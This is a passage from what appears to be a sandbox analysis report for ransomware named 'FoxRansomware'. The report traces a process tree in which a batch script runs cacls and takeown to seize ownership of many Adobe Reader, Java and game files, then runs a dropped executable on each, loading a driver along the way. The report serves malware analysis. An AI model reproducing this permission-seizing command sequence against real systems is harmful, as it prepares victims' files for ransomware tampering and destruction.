    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
    3⤵
    - Modifies file permissions
    PID:1704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "ENUtxt.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1996
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "ENUtxt.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1424
    - - C:\Users\Admin\AppData\Local\Temp\8Pk9qSFt64.exe
        
        8Pk9qSFt.exe -accepteula "ENUtxt.pdf" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:1524
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
  2⤵
  - Loads dropped DLL
  PID:1392
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
    3⤵
    - Modifies file permissions
    PID:1756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "StandardBusiness.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1304
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "StandardBusiness.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1608
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:268
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
  2⤵
  - Loads dropped DLL
  PID:536
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
    3⤵
    PID:924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
    3⤵
    - Modifies file permissions
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "DefaultID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:804
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "DefaultID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1632
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1548
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
  2⤵
  - Loads dropped DLL
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
    3⤵
    PID:1416
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
    3⤵
    - Modifies file permissions
    PID:1776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "AdobeID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1368
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "AdobeID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1324
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1624
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
  2⤵
  - Loads dropped DLL
  PID:1708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
    3⤵
    PID:1000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
    3⤵
    - Modifies file permissions
    PID:1268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1392
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1940
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1020
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""
  2⤵
  - Loads dropped DLL
  PID:860
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"
    3⤵
    - Modifies file permissions
    PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "Dynamic.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:292
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "Dynamic.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:796
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:536
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""
  2⤵
  - Loads dropped DLL
  PID:1536
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C
    3⤵
    PID:1160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
    3⤵
    - Modifies file permissions
    PID:1604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "SignHere.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:560
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "SignHere.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1528
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:1652
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:1800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1816
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:276
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:292
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:1544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1512
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:1712
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1368
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C
    3⤵
    PID:760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "HeartsMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1976
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "HeartsMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1616
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1676
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "MahjongMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1960
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "MahjongMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:520
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1304
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "ChessMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:804
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "ChessMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:1404
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:860
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""
  2⤵
  - Loads dropped DLL
  PID:1300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "PurblePlaceMCE.png" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2028
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "PurblePlaceMCE.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:536
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:552
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""
  2⤵
  - Loads dropped DLL
  PID:108
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"
    3⤵
    - Modifies file permissions
    PID:1704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "RTC.der" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1944
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "RTC.der" -nobanner
      4⤵
      Executes dropped EXE
      PID:1728
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""
  2⤵
  - Loads dropped DLL
  PID:520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C
    3⤵
    PID:1304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"
    3⤵
    - Modifies file permissions
    PID:1816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "end_review.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1876
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "end_review.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:740
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:272
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""
  2⤵
  - Loads dropped DLL
  PID:1868
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C
    3⤵
    PID:952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"
    3⤵
    - Modifies file permissions
    PID:948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "reviews_joined.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1384
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "reviews_joined.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1256
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1544
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""
  2⤵
  - Loads dropped DLL
  PID:1828
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"
    3⤵
    - Modifies file permissions
    PID:1276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "server_ok.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1740
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "server_ok.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1736
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""
  2⤵
  - Loads dropped DLL
  PID:828
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C
    3⤵
    PID:800
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"
    3⤵
    - Modifies file permissions
    PID:1616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "warning.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:560
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "warning.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1268
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""
  2⤵
  - Loads dropped DLL
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:1676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"
    3⤵
    - Modifies file permissions
    PID:1000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1608
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1600
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1304
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""
  2⤵
  - Loads dropped DLL
  PID:1880
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C
    3⤵
    PID:604
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"
    3⤵
    - Modifies file permissions
    PID:268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "SY______.PFB" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1120
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "SY______.PFB" -nobanner
      4⤵
      Executes dropped EXE
      PID:992
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""
  2⤵
  - Loads dropped DLL
  PID:1384
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"
    3⤵
    - Modifies file permissions
    PID:1320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "brt.hyp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1712
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "brt.hyp" -nobanner
      4⤵
      Executes dropped EXE
      PID:664
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1276
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""
  2⤵
  - Loads dropped DLL
  PID:1740
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C
    3⤵
    PID:1828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"
    3⤵
    - Modifies file permissions
    PID:1512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "eng32.clx" -nobanner
    3⤵
    - Loads dropped DLL
    PID:876
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "eng32.clx" -nobanner
      4⤵
      Executes dropped EXE
      PID:316
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1368
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""
  2⤵
  - Loads dropped DLL
  PID:560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C
    3⤵
    PID:828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"
    3⤵
    - Modifies file permissions
    PID:1944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 8Pk9qSFt.exe -accepteula "CENTEURO.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:972
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
      8Pk9qSFt.exe -accepteula "CENTEURO.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:108
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\8Pk9qSFt.exe
    8Pk9qSFt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""
  2⤵
  - Loads dropped DLL
  PID:1608
- - C:\Windows\SysWOW64\cacls.exe
